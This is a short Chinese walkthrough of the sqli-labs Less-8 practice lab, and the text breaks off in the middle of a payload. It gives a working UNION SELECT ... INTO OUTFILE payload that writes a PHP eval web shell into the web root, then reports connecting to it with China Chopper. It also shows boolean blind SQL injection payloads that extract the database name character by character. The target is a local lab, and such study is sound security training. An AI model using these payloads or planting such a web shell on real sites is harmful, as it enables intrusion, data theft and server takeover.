方法一:看是否有file权限,利用into outfile
1.?id=2’ --+ 页面回显正常,不赘述了,这里是单引号字符型注入
2.页面没有显示位,没有数据库报错信息。
我们先尝试一下是否有file权限(先判断字段数)
3.当输入3时返回正常,输入4时不返回。
http://127.0.0.1/sqli-labs/Less-8/?id=1' union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "D:\\phpstudy2\\WWW\\hello.php" --+
我们菜刀连接成功!!
方法二:布尔盲注
id=1回显,价格单引号不回显,构造一下验证是不是布尔型payload ?id=1’ and 1=1 --+ 回显了,说明这里存在布尔盲注
在布尔型注入中,正确会回显,错误没有回显,以此为依据逐字爆破,注意id=1
手工注入时可使用例如left((select database()),1)<‘t’ 这样的比较二分查找方法快速爆破。
可以通过 > < 比较字符大小加速爆破
暴库payload
?id